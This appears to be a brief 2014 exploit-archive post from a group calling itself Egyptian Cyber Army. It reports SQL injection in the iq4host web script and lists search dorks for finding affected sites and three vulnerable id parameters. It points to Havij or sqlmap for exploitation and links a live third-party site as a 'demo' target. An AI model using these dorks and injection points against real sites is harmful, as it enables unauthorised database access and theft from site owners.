facebook facebook twitter rss

iq4host script SQL injection vulnerability

Author: AlGenius David , Published: 03-07-2014
iq4host script SQL injection vulnerability

Discovered By : AlGenius David


****************************************************

Dorks:-

Dork 1 : This Script Powered By iq4host

Dork 2 : inurl:"show_cat.php?id="

****************************************************

Vulnerability:-

www.site.com/show_cat.php?id=[SQL]
www.site.com/show_news.php?id=[SQL]
www.site.com/show_page.php?id=[SQL]

You can exploit it with Havij or Sqlmap

****************************************************
Explanation of vulnerability on YouTube :-

https://www.youtube.com/watch?v=GlkR1NQoMBs
==============================================
Demo : http://www.sumer-news.com/show_cat.php?id=24'

Our Website : http://egyptiancyberarmy.com/

My Page on Facebook : https://www.facebook.com/david.algenius

Egyptian Cyber Army Page on Facebook : https://www.facebook.com/egyptianarmy3030

Greets to : Egyptian Cyber Army members

Like us on Facebook :